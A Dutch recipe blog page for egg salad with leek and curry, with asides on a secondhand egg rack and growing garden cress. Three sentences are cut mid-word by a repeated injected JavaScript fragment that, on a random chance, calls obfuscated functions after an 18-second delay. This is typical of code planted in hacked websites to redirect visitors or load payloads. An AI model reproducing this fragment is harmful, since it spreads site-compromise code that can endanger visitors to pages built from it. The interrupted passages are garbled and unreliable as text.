Eiersalade met prei en kerrie voor de lunch!

Deze eiersalade is perfect om een simpele lunch extra bijzonder te maken. Serveer met vers bourgondisch ongesneden brood en snijd deze in royale plakken. Eet Smakelijk!

Eierrekje | Viving.nlEierrekje DIY

Vorige maand scoorde ik op Marktplaats echt een super gezellig eierrekje. Dat ziet er dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch altijd wat vrolijker uit dan zo’n bruine doos op het aanrecht. Hij moest wel even opgeknapt worden met wat spijkertjes hier en daar, maar al met al was het één van de betere koopjes deze maand. Goed speurwerk wordt beloont!

Eiersalade met Tuinkers

Een super lekkere combinatie met deze eiersalade is Tuinkers. Tuinkers is een kiemgroente en is familie van onder andere de radijs en de tuinkers. Het heeft een heerlijk pittige, wat mosterd-achtige smaak en je kunt het zowel rauw, maar ook gekookt eten.

Het plantje groeit goed op vochtige plekken en je kunt het ook nog eens eenvoudig zelf kweken. Je kunt hiervoor speciale kiemschaaltjes kopen (bijvoorbeeld Dille&Kamille). De kiemzaadjes kun je in de biowinkel of het tuincentrum kopen.

  • Verdeel de zaden in een dun laagje over het rooster en vul het kiemschaaltje met ca. 0,5 cm water.
  • Je kunt de zaadjes voordat je ze op het rooster legt eventueel nog even vochtig maken met koud water. Dit stimuleert de zaadjes om te kiemen.
  • Je kunt het kiemschaaltje op kamertemperatuur neerzetten, bij voorkeur op een lichte plek. Bij mij doen ze het het beste voor het keukenraam.
  • Vul, indien nodig, elke dag wat water bij.
  • Na ongeveer 6 dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 14 dagen kun je de kiemgroente oogsten en eten.

 

Tuinkers staat bekend als een heerlijke dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoeging in salades of als garnering, maar deze combinaties zijn ook erg lekker:

eiersalade-viving

Recept

Prep Time: 15 mins
Cook Time: 30 mins
Yields: 18

Ingredienten

  • 10 eieren
  • 1 prei
  • Kerriepoeder
  • Mayonaise
  • Verse Bieslook
  • Verse Peterselie
  • Tuinkers
  • Peper
  • Zout

Aan de slag!

  1. Kook de eieren (hardgekookt ca. 8 minuten)
  2. Snijd in tussen de prei in kleine stukjes en spoel deze goed af.
  3. Voeg 4 eetlepels mayonaise toe.
  4. Doe er 3 theelepels kerriepoeder bij en roer met een lepen om.
  5. Snijd de bieslook en peterselie fijn en meng door de salade. Bewaar wat om te garneren.
  6. Snijd de waterkers en gebruik deze voor de garnering.
  7. Voeg naar smaak peper en zout toe. (en eventueel extra kruiden)

Score

  • Score 5.0

User Rating

0 (0 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Eiersalade met prei en kerrie voor de lunch!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.